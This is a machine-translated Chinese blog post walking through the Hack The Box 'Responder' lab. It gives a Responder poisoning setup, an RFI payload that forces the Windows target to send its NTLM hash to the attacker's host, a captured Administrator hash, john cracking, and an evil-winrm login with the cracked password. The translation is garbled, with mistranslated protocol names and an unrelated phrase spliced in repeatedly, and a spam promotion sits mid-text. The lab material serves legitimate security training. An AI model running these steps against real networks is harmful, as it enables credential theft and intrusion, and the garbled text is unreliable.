响应者与邪恶的winRM一起工作，远程登录到Windows。，响应者与WinRM，远程登录Windows的挑战与应对

摘要：响应者与winRM合作，通过远程登录Windows系统。这种合作涉及与邪恶势力对抗，确保系统的安全性和稳定性。通过远程登录，响应者能够更有效地管理和维护Windows系统，确保系统的正常运行。这种合作对于保护系统免受潜在威胁和攻击具有重要意义。

同上。文件夹 certs/ 包含 2 个默认密钥免费远程服务器在线，包括一个虚拟私钥。这是为了让响应程序开箱即用。添加了一个脚本，以防您需要生成自己的自签名密钥对。

内置 LDAP 身份验证服务器

为了将LDAP身份验证重定向到此工具，您需要为早于Vista的Windows版本设置选项-r（用于HTTP服务器查找的NBT-NS查询使用工作站服务名称后缀发送）。对于 Vista 及更高版本，使用 LLMNR。服务器支持 NTLMSSP 哈希和简单身份验证（明文身份验证）。该服务器已在Windows支持工具“ldp”和LdapAdmin上成功测试。

内置FTP，POP3，IMAP，SMTP身份验证服务器

该模块收集明文凭据

【----帮助网络安全学习，需要网络安全学习资料关注我，在私信中回复“信息”免费获取----]。

（1）网络安全学习与成长路径思维导图

（2）60+网络安全经典常用工具包

（3）100+SRC漏洞分析报告

（4）150+网络安全攻防实用技术电子书

（5）最权威的CISSP认证考试指南+题库

（6） 超过1800页的周大福实用技能手册（

7）收集最新网络安全工厂的面试问题（包括答案）（

8）APP客户端安全检测指南（安卓+IOS）。

内置 DNS 服务器

服务器将应答 A 类查询。当与 ARP 欺骗结合使用时，这非常方便。

内置 WPAD 代理服务器

如果启用了自动检测设置，则此模块将捕获来自网络上启动 Internet Explorer 的任何人的所有 HTTP 请求。该模块非常有效。您可以在 Responder.conf 中配置自定义 PAC 脚本，并将 HTML 注入服务器的响应中。请参阅 Responder.conf。

浏览器侦听器

该模块允许在隐身模式下查找 PDC。

指纹识别

使用选项 -f 时，响应程序会识别发出 LLMNR/NBT-NS 查询的每个主机。所有采集模块仍可在指纹模式下工作。

ICMP 重定向

python tools/Icmp-Redirect.py

适用于 Windows XP/2003 及更早版本上的 MITM 域成员。这种攻击与DNS模块相结合非常有效。

恶意 DHCP

python tools/DHCP.py

DHCP 通知欺骗。允许您让真正的 DHCP 服务器发布 IP 地址，然后发送 DHCP 通知回复以将您的 IP 地址以及您自己的 WPAD URL 设置为主 DNS 服务器。

分析模式

此模块允许您查看网络上的 NBT-NS、BROWSER、LLMNR、DNS 请求，而不会中断任何响应。此外，您可以被动映射域、MSSQL 服务器、工作站，并查看 ICMP 重定向攻击是否在您的子网上有效。

0x02.3 响应者欺骗原理

在使用 Responder 之前，让我们了解一下 windwos 默认启用的三种协议，即链路本地组播名称解析 （LLMNR）、名称服务器 （NBNS） 协议和组播 DNS （mdns） 协议。

LLMNR

链路本地组播名称解析 （LLMNR） 是一种基于域名系统 （DNS） 数据包格式的协议，IPv4 和 IPv6 主机可以通过该协议在同一本地链路上的主机上执行名称解析。自Windows Vista以来，Windows操作系统一直支持内联，Linux系统已通过systemd实现此协议。它通过UDP 5355端口进行通信，LLMNR支持IPV6。

国家统计局

网络基本输入/输出系统 （NetBIOS） 名称服务器 （NBNS） 协议是基于 TCP/IP 的 NetBIOS （NetBT） 协议系列的一部分，提供基于 NetBIOS 名称访问的网络上的主机名和地址映射方法。通信通过 UDP 137 端口进行，但 NBNS 不支持 IPV6。

移动域名系统

在计算机网络中，多播 DNS （mDNS） 协议将主机名解析为不包含本地名称服务器的小型网络中的 IP 地址。它是一种零配置服务，使用与单播域名系统 （DNS） 基本相同的编程接口、数据包格式和操作语义。虽然Stuart Cheshire将mDNS设计为独立协议，但它适用于标准DNS服务器。它通过UDP 5353端口进行通信，MDN还支持IPV6。

目前只有 Windows 10 及以上系统支持 MDNS，经过测试，发现 MDNS 在禁用 LLMNR 后也会被禁用。

一般来说，以上几种协议在Windows中都是默认开启的，主要作用是在DNS服务器解析失败后尝试解析Windows主机名，正是因为默认启用，且实现方式与ARP协议类似，没有认证过程，所以会造成基于这两种协议的各种欺骗， 而响应者就是这样欺骗受害机器，使受害机器能够在后续的认证中发送其凭证。

0x02.4 用法

root@kali:~#responder -h
用法：responder -I eth0 -w -d
或者：
responder -I eth0 -wd
选项：
   --version 显示程序的版本号并退出
   -h, --help 显示此帮助消息并退出
   -A, --analyze 分析模式。 此选项允许您查看NBT-NS，
                         BROWSER、LLMNR 请求没有响应。
   -I eth0，--接口=eth0
                         要使用的网络接口，可以使用“ALL”作为
                         所有接口的通配符
   -i 10.0.0.21,--ip=10.0.0.21
                         要使用的本地 IP（仅适用于 OSX）
   -6 2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed, --externalip6=2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed
                         使用其他 IPv6 地址对所有请求进行毒害
                         响应者之一。
   -e 10.0.0.22, --externalip=10.0.0.22
                         使用其他 IP 地址毒害所有请求
                         响应者之一。
   -b, --basic 返回基本 HTTP 身份验证。 默认值：NTLM
   -d, --DHCP 启用 DHCP 广播请求的应答。 这
                         选项将在 DHCP 响应中注入 WPAD 服务器。
                         默认值：假
   -D, --DHCP-DNS 该选项将在 DHCP 中注入 DNS 服务器
                         响应，否则将添加 WPAD 服务器。
                         默认值：假
   -w, --wpad 启动 WPAD 恶意代理服务器。 默认值为
                         错误的
   -u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY
                         恶意 WPAD 代理使用的上游 HTTP 代理
                         传出请求（格式：主机:端口）
   -F, --ForceWpadAuth 对 wpad.dat 文件强制进行 NTLM/Basic 身份验证
                         恢复。 这可能会导致登录提示。 默认：
                         错误的
   -P, --ProxyAuth 强制 NTLM（透明）/基本（提示）
                         代理的身份验证。 WPAD 不需要
                         在。 这个选项非常有效。 默认值：假
   --lm 强制 Windows XP/2003 和 LM 哈希降级
                         早些时候。 默认值：假
   --disable-ess 强制 ESS 降级。 默认值：假
   -v, --verbose 增加详细程度。

0x03 范围战斗 - 响应者和邪恶的胜利RM与远程登录到Windows一起工作

测试环境：

kali （攻击机）   192.168.154.128 
vpn接入内网环境: ip -> 10.10.14.115
HTB靶机 windows 10 （受害机） 10.129.48.161

打开目标计算机

前面的步骤很简单：

任务 1

使用 IP 地址访问 Web 服务时，我们要重定向到的域是什么？

Unika.htb只是

卷曲只是探测它

要访问域名，您需要在本地主机文件中配置配置

任务 2

服务器上使用哪种脚本语言来生成网页？

.PHP

只需使用瓦帕分析仪插件

任务 3

用于加载网页不同语言版本的 URL 参数的名称是什么？

页

查看网页源代码：

任务 4

页面参数的以下哪一个值是利用本地文件包含 （LFI） 漏洞的示例：“法语.html”、“//10.10.14.6/somefile”、“../../../../../../../../Windows/system32/drivers/etc/hosts“， ”minikatz.exe”.. /.. /.. /.. /.

. /Windows/system32/drivers/etc/hosts

这里熟悉的文件包含漏洞（FI）主节点可以直接进入正题：

任务5

页面参数的以下哪一个值是利用远程文件包含 （RFI） 漏洞的示例：“法语.html”、“//10.10.14.6/somefile”、“../../../../../../../../Windows/system32/drivers/etc/hosts“， ”minikatz.exe”//

10.10.14.6/somefile

这里和上一个问题一样

任务 6

NTLM 代表什么？

NT （新技术） 局域网管理器 （NTLM）

只需查看维基百科（您可以深入挖掘，这是内联网的开始......

）。

任务7

我们在响应程序实用程序中使用哪个标志来指定网络接口？

-我

您可以从上面的帮助文档中找到答案

任务8

有几种工具可以接受 NetNTLMv2 质询/响应，并尝试数百万个密码，以查看其中是否有任何密码生成相同的响应。一个这样的工具通常被称为约翰，但全名是什么？

开膛手约翰

也可以查阅维基

本文中的关键操作可以直接跳转到此处

接下来将是本文的重点：

首先，检查您自己的IP（VPN）并启用监视

启用侦听：响应者 -I tun0 -w -d

然后，我使用 Web 端的远程文件包含漏洞 （RFI） 访问我自己的任何文件 （10.10.14.115） 来执行哈希泄漏

有效载荷：

http://unika.htb/index.php?page=//10.10.14.115/somefile

然后，响应者可以使用用户密码从受害者 （10.129.48.161） 捕获哈希值

Administrator::RESPONDER:9baf19c29ef21567:761FED4C7E3DB9BCFEF3E747E797B10D:010100000000000000E56ED168C8D901D119B9B66118B37A00000000020008004E0044004200450001001E00570049004E002D004C004C0047004200590033003100340035005800510004003400570049004E002D004C004C004700420059003300310034003500580051002E004E004400420045002E004C004F00430041004C00030014004E004400420045002E004C004F00430041004C00050014004E004400420045002E004C004F00430041004C000700080000E56ED168C8D901060004000200000008003000300000000000000001000000002000008400CDB8B7CEB11867758BC8795830343D40C19570BB7035C3D1AF789B7CE19F0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100310035000000000000000000

将此字符串保存到 txt 文件，然后使用 JHON 进行哈希爆炸：

john -w=/usr/share/wordlists/rockyou.txt admin.txt

管理员用户可以获取的密码是：羽毛球

任务9

管理员用户的密码是什么？

羽毛球

任务 10

我们将使用 Windows 服务（即在机器上运行）使用我们恢复的密码远程访问响应程序计算机。它侦听什么端口 TCP？

5985

将 nmap 用于开放端口探测：

nmap -p- --min-rate 1000 -sV 10.129.48.161

获取完用户的账号和密码后，就该使用开头提到的邪恶winRM

evil-winrm -i 10.129.48.161 -u administrator -p badminton

这使我们能够远程登录到Windows服务器，接下来我们可以做很多事情。

第一步肯定是找到主题需要的标志

找到我们需要的标志文件只是基础，不要急于提交，否则你会浪费这个练习工具的好机会

您可以尝试更多命令：

menu：加载 Invoke-Binary 和 l04d3r-LoadDll 函数。当 PS1 加载时，将显示其所有功能。

下载

：将远程文件下载到本地级别，如果远程文件在当前目录中，则无需local_path。

download local_path remote_path

在这里您可以尝试下载标志.txt

上传：将文件从本地（kali）上传到目标机器，如果本地文件与evil-winrm.rb文件在同一个目录中，则不需要remote_path。

upload local_path remote_path

在这里您可以尝试上传 txt 文件

调用二进制：允许在内存中执行从 C# 编译的 exe。可以使用 Tab 键自动完成名称，最多允许 3 个参数。可执行文件必须位于 -e 参数设置的路径中。

在这里，由于我在连接时没有指定exe的路径免费远程服务器在线，因此无法正常执行命令。服务

：列出所有服务（无需管理员权限）。

加载 PowerShell 脚本

要加载PS1文件，您所要做的就是键入名称（您可以使用制表符补全）。脚本必须位于 -s 参数中设置的路径中。再次键入菜单并查看加载的功能。

我没有在这里指定路径，所以没有PowerShell脚本，所以我无法正确演示它。

最后

这次分享到此结束，当然还有很多操作和细节没有展现出来，后续留给大师们去探索。